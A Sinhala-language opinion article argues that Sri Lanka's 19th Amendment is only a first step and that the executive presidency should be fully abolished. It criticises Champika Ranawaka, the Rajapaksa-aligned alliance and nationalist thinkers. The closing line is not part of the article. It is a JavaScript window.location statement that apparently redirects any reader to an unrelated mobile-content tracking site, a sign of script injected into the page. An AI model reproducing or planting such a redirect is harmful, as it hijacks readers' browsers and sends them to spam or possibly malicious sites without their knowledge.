විධායක ජනාධිපතික‍්‍රමය සහමුලින් අහෝසි කිරීමේ සටන අත් නොහරිමු!

කුමුදු කුසුම් කුමාර

19 වැනි ව්‍යවස්ථා සංශෝධනය සම්මතවීම ලාංකේය දේශපාලන ඉතිහාසයේ ඓතිහාසික සන්ධිස්ථානයක් බව සැබෑය. එය ලාංකේය පුරවැසි ජනතාව ලබාගත් විශිෂ්ට ජයග‍්‍රහණයක් බවද සැබෑය. මන්දයත් එය සටහන් කරන්නේ 1978දී මෙරටට හඳුන්වා දුන් විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීමෙහිලා මෙරට පුරවැසි ජනතාව තුළ වූ දැඩි අධිෂ්ඨානයේ සහ ඒ සඳහා ඔවුන් වසර 37ක් අත් නොහැර ගෙන ගිය ව්‍යායාමයේ ප‍්‍රතිඵලයක් ලෙස එම තනතුරෙහි බලතල සීමා කිරීම රටේ ව්‍යවස්ථාවට ඇතුළු කරගනු ලැබීම බැවිනි.

19වැනි ව්‍යවස්ථාව සම්මත කරගැනීමේ ව්‍යායාමය බෙහෙවින් දුෂ්කර එකක් වීය. සුළුතර ආණ්ඩුවක් ඉදිරිපත් කළ යෝජනාවකට බහුතරය එකඟ කරගැනීමට සිදුවූ හෙයිනි. එම බහුතරයේ ප‍්‍රධාන කණ්ඩායම ජනාධිපති මෛත‍්‍රී නායකත්වය දෙන ශ‍්‍රීලනිපයට අයත්වීමම හුදෙක් මෙම කටයුත්ත පහසු කළේ නැත. ජාතික ආණ්ඩුවක් වශයෙන් හැඳින්වුවද එජාපයේත් ශ‍්‍රීලනිපයේත් සහවාසය පේ‍්‍රම විවාහයක් නොව කපුකමකින් කෙරුණු විවාහයකි. සාමාන්‍යයෙන් ගත් කළ සම්ප‍්‍රදායික යෝජිත විවාහයක පදනම වන්නේ සහවාසය කැමැත්තෙන් භාරගෙන එය සාර්ථක කිරීම සඳහා කටයුතු කිරීම යි. නමුත් මෙහිදී ඊට පටහැනිව යමින් ආරම්භක අවස්ථාවේ පටන්ම අපට දැකිය හැකිවූයේ එළහරකෙකු සහ මීහරකෙකු එකට බාන් කළ අවස්ථාවක් මෙන් දෙපසට ඇදීමේ නැඹුරුවයි. ළඟ ළඟම එන ඉදිරි මහ මැතිවරණයකදී පාර්ලි මේන්තු ආසන බහුතරයක් දිනා තමන්ගේ නායකත්වයෙන් ආණ්ඩුවක් පිහිටුවීමේ අපේක්ෂාව මේ පක්ෂ දෙකටම තිබීම ඊට හේතුවයි. එහෙයින් ජනතාව හමුවේ තම දේශපාලන නායකත්වය තහවුරු කර ගැනීමට මෙම දෙපක්ෂයම පොර බදිති.

ජනාධිපති මෛත‍්‍රීගේ මෙම ව්‍යායාමය දුෂ්කර කළ අනෙක් බලවේගය ජනතාව විසින් බලයෙන් පහකළ හිටපු ජනාධිපති මහින්ද රාජපක්ෂ පිටුපස සිට මෙහෙයවන එක්සත් ජනතා නිදහස් සන්ධාන කණ්ඩායම යි. නැවත මහින්ද රාජපක්ෂ බලයට ගෙන ඒමේ සිහිනය තුළ තවමත් ජීවත් වන මෙම කණ්ඩායම රනිල් විරෝධී භීතිකාවකින් පෙළෙන පැරණි වාමාංශික නායකයන්, විමල් වීරවංශ වැනි ඊනියා දේශි හිතෛෂීන් සහ දිනේෂ් ගුණවර්ධන වැනි උග‍්‍ර ජාතිවාදී මතවාදී දරන්නන් නායකත්වය දෙන පිරිසකගෙන් සමන්විත වෙයි. මෙම කණ්ඩායමට න්‍යායික නායකත්වය දෙන්නේ දයාන් ජයතිලක, ගෝමින් දයාසිරි, ගුණදාස අමරසේකර, නලින් ද සිල්වා වැනි පිරිසකි. (සංශෝධනවලට මුවාවී 19ට පක්ෂව ඡුන්දය දීම පිළිබඳ පොදුවේ සන්ධානයේ මන්ත‍්‍රීවරුත් එසේ කරන අතරතුරම ”සංශෝධනවලට එකඟ වූ නිසා කැමැත්ත දෙමි” ප‍්‍රකාශ කරමින් පුහු වීරයෙකු වන්නට උත්සාහ දැරීම පිළිබඳ විමල් වීරවංශ විශේෂයෙනුත් නලින් ද සිල්වාගේ හෙළා දැකීමට ලක් වී ඇත.)
මොවුන්ට දිනාගත හැකි පිරිසක් එජාපය සමග සහවාසයට බලකරනු ලැබ සිටින ශ‍්‍රීලනිපය තුළ ද වෙයි. මහින්ද රාජපක්ෂ ඔහුට එල්ල කොට ඇති චෝදනාවක් සම්බන්ධයෙන් අල්ලස් කොමිසමට කැඳවූ අවස්ථාවේ ඔහු එහි යාමට බිය වූ විට එම කැඳවීමට විරෝධය පළකරමින් මන්ත‍්‍රීවරුන් ඉදිරිපත් කළ පෙත්සමට අත්සන් එකසිය ගණනක් ලැබුණේ එම හේතුවෙනි. මෙම ජාතිවාදීන් සහ ඊනියා වාමාංශිකයන් එකම වේදිකාවේ අසුන් ගැනීමේ ඇතැමුන් මවිත කරවන දසුන පිටුපස ඇති පොදු සාධකය රනිල් විරෝධය සහ මහින්ද යළි රජ කරවීමේ සිහිනය නමුත් ක‍්‍රියාවේ ප‍්‍රතිඵල අතින් ගත් කල හරයෙන් මෙය ජාතිවාදීය. මන්දයත්, මෙහි මෙහෙයුම් බලවේගය වන විමල් විරවංශලා න්‍යායික ශක්තිය ලබන්නේ මෛත‍්‍රී-රනිල් ආණ්ඩුව යටතේ යළි එල්ටීටීය පණගැන්වී නොරට විසිරුණු එල්ටීටීඊ කොටස්වල මූල්‍ය ශක්තියෙන් පාර්ලිමේන්තු මන්ත‍්‍රීවරුන් මිලට ගෙන රට දෙකඩ කරන ඇමරිකානු-එංගලන්ත හවුල් අධිරාජ්‍යවාදී කුමන්ත‍්‍රණයක් ඇතැයි ? දුටු බියකරු සිහිනයක ගැලෙමින් මෙන් දිවා කලත් නිද්‍රාවේ සිටින දයාන් ජයතිලක වැන්නන්ගේ න්‍යාය ගැන්වීමෙන් වන හෙයිනි.

මේ සියලූ කණ්ඩායම්වලටත් වඩා විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීමේ ජනතා අපේක්ෂාවට එරෙහිව මුල සිටම ක‍්‍රියා කරමින් සිට ඇත්තේ චම්පික රණවක නායකත්වය දෙන ජාතික හෙළ උරුමය යි. විධායක ජනාධිපති අහෝසි කිරීම වෙනුවට ඒ එහි අත්තනෝමතික බලතල සීමා කළ යුතුය යන්න මුල සිටම ඔවුන්ගේ ස්ථාවරය වී තිබුණි. පොදු අපේක්ෂක මෛත‍්‍රී බහුජන සංවිධාන පනහකට ආසන්න ගණනක් සමග විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීම ප‍්‍රධාන කොට ගත් ප‍්‍රතිපත්ති මාලාවක් සඳහා ගිවිසුමකට එළඹෙන විට ජාතික හෙළ උරුමය සමග මෛත‍්‍රී වෙනම අත්සන් කළ ගිවිසුමට එකඟ වූයේ විධායක ජනාධිපතික‍්‍රමයේ බලතල සීමා කිරීමට පමණි. මෙහි ඇති බලවත් ප‍්‍රතිවිරෝධය සහ එයින් ඇතිවිය හැකි ඵල විපාක පිළිබඳ ගැටලූව එම අවස්ථාවේදී මතු නොවුණේ එසේ කිරීමේ වගකීම තිබුණු ප‍්‍රමුඛ පිරිස් එම දේශපාලන නිමේෂයේ ජවවේගී චලනයන් තුළ නිමග්න වී සිටිම නිසා මිස ඔවුන් එම ස්ථාවරය බැ?රුම් ලෙස නොසලකා පිළිගත් හෙයිනැයි නොසිතමි. තවද එය එම ක‍්‍රියාවලියේ කේන්ද්‍රස්ථානයේ නොසිටි පිරිස්වලට ලෙහෙසියෙන් බලපෑම් කළ නොහැකි අධි ජවයක් රැුගත් චලනයක් වීය. ජනාධිපති මෛත‍්‍රී මෑත දිනක පුරවැසි සංවිධාන නියෝජිතයන් සමග කළ සාකච්ඡුාවකදී ජනාධි පතිවරණ ව්‍යාපාරයේ පැවති ගතිකය පිළිබඳ පොදුවේ අදහස් දක්වමින් කියා සිටියේ එම අවස්ථාවේ සිදුවීම් කොතරම් වේගයකින් සිදුවීදයත් යමක් පිළිබඳ වැඩිදුර සිතන්නට අවස්ථාවක් නොතිබුණු බවත් තමාට සහයෝගය දෙන්නට ඉදිරිපත් වූ කවරෙකු වුවත් පිළිබඳ දෙවරක් නොසිතා ඔවුන් එකතු කරගත්තේය යන්න කියැවෙන අදහසකි.

පසුබිම කුමක් වුවද එහි අවසාන ප‍්‍රතිඵලය වූයේ පාර්ලිමේන්තුවේ ආසන දෙකක් පමණක් ඇති උග‍්‍ර සිංහල -බෞද්ධ ජාතිකවාදී පක්ෂයක් මෛත‍්‍රී-රනිල් රජයේ බලගතු ඇමතිකමක් ද ලැබ එහි තීරණාත්මක බලපෑම් කළ හැකි තැනක් අරා සිටීමට පත්වීමයි. චම්පික රණවක මේ මොහොතේත් කියා සිටින්නේ විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීම මනෝරාජික අරාජිකවාදී සටන් පාඨයක් බවයි. විධායක ජනාධිපති ධුරය අහෝසි කිරීමෙන් රට අස්ථාවර වන බව චම්පික කියන විට ඔහු වටයේ දකුණු පැත්තෙන් ප‍්‍රවිෂ්ටව එහිම වම් පැත්තෙන් ප‍්‍රවිෂ්ටව දකුණු කෙළවරට පැමිණි සිටින දයාන් ජයතිලකලා සමග එකම මතවාදී වේදිකාවේ දයාන් ළඟින්ම අසුන් ගනියි.
19 වැනි ව්‍යවස්ථා සංශෝධනය සම්මත කරගැනීමට පසුගිය ජනාධිපතිවරණයේදී මහින්ද රාජපක්ෂ මහතා වටා එකතු වූ බලවේගවල විශිෂ්ට සහයෝගයත් ලැබීම තමන් අගය කරන බව චම්පික රණවක කියයි. එයින් ගම්‍ය කෙරෙන දේ අප වටහා ගතයුත්තේ මා දැනටමත් කියා ඇති පරිදි එම මහින්ද රාජපක්ෂ හිතැති කණ්ඩායම ක‍්‍රියා කළේ ව්‍යවස්ථා සංශෝධනය සම්මත කරගැනීමට බාධා කරමිනි යන පසුබිමෙහිය.

19 ව්‍යවස්ථා සංශෝධනයෙන් සෑහීමට පත් නොවී මීළඟට බලයට පත්වන ආණ්ඩුව ව්‍යවස්ථා සම්පාදක මණ්ඩලයක් ලෙස පත් කොට විධායක ජනාධිපති ක‍්‍රමය සම්පූර්ණයෙන් අහෝසි කිරීමේ යෝජනාව මනෝරාජික අරාජිකවාදී එකක් බවත් රටේ ව්‍යවස්ථාවට අනුව පාර්ලිමේන්තුව ව්‍යවස්ථා දායක මණ්ඩලයක් බවට පත් කිරීමේ කිසිම ඉඩකඩක් නැති බවත් චම්පික රණවක කියයි. නමුත් අපේම ලංකාවේ භාවිතාවෙන් අත්දුටු සැබෑව වන්නේ පවත්නා ව්‍යවස්ථාවට එරෙහිව යමින් නව ව්‍යවස්ථාවක් සම්පාදනය කිරීමේ වලංගුභාවය ඊට ලැබෙන පොදු ජන පිළිගැනීම මත මිස පවත්නා ව්‍යවස්ථාවක් පනවන සීමාවන් ගෙන් තීන්දු නොවන්නක් බව යි. 1972 ජනරජ ව්‍යවස්ථාව එලෙස පැවති ව්‍යවස්ථාවට එරෙහිව යමින් පාර්ලිමේන්තුව ව්‍යවස්ථා දායක මණ්ඩලයක් බවට පත් කොට නව ව්‍යවස්ථාවක් සම්මත කරගත හැකි බවට උදාහරණයකි. ඒ අනුව විධායක ජනාධිපති ක‍්‍රමය මුළුමනින්ම අහෝසි කොට නව ව්‍යවස්ථාවක් සම්පාදනය කළ යුතුද? නැත්ද? යන්න තීරණය කිරීම මෙරට බහුතර පුරවැසි ජනතාවගේ අයිතියක් මිස දේශපාල නඥයන්ගේ වර ප‍්‍රසාදයක් නොවේ.

විධායක ජනාධිපති ක‍්‍රමය අහෝසි කිරීම ප‍්‍රායෝගිකව ඉටුකළ නොහැකි බව ඔවුන් විසින් පෙන්වා දෙනු ලැබූ බව චම්පික රණවක කියන විට අප වටහා ගත යුතු කරුණ ජනමත විචාරණයකට නොයා පවත්නා ව්‍යවස්ථාවේ මූලික පදනම වෙනස් කළ නොහැකිය යන කරුණයි. නමුත් එය කළ නොහැක්කක් නොවේ.
මෙරට පුරවැසි සංවිධානවල එක් ඉදිරි ප‍්‍රධාන කාර්යභාරයක් වන්නේ විධායක ජනාධිපතික‍්‍රමය අහෝසි කිරීම වෙනුවෙන් කටයුතු කිරීම සටන් පාඨය කොටගෙන ඉදිරි මහ මැතිවරණයේදී ඒ වෙනුවෙන් පෙනී සිටින කොටස් ජයග‍්‍රහණය කරවීම සඳහා නායකත්වය දීමයි.

ලංකාව තුළ යළිත් සිංහල බෞද්ධ ජාතිවාදී බලවේග අධිපතිභාවයට පත්වීම වැළැක්වීමට නම් මෙය කළ යුතුමය. ලංකාවේ දේශපාලන අනාගතය රැඳී ඇත්තේ විධායක ජනාධිපති ක‍්‍රමය මුළුමනින්ම අහෝසි කොට, යළිත් පුරවැසියාට සෘජුව වගකියන මන්ත‍්‍රීවරුන් ඡුන්ද කොට්ඨාසවලින් තෝරා පත්කර ගත හැකි ඒ සමගම කුඩා ජනවාර්ගික ප‍්‍රජාවන්ට මෙන්ම සෙසු කුඩා දේශපාලන පක්ෂවලටත් සාධාරණයක් ඉටුවන මිශ‍්‍ර නියෝජනයක් ගෙනෙන පාර්ලිමේන්තු ප‍්‍රජාතන්ත‍්‍රවාදී ක‍්‍රමයක් ස්ථාපිත කිරීම තුළය.

එම නියෝජිත පාර්ලිමේන්තු ප‍්‍රජාතන්ත‍්‍රවාදය ස්ථාපිත කොටගෙන ක‍්‍රමිකව අප ගමන් කළයුත්තේ පුරවැසියා උපරිමයෙන් බලගැන්වෙන පරිදි රාජ්‍ය බලය උපරිමයෙන් විමධ්‍යගත කෙරෙන සන්ධීය පාලන ක‍්‍රමයක් ගොඩ නඟා ගත හැකි අනාගතයකටය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;